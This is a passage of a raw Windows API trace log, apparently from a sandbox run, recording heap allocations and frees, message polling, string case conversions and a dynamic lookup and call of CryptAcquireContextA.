RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.704] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.704] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.705] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.705] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.706] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.712] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.712] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.713] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.717] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 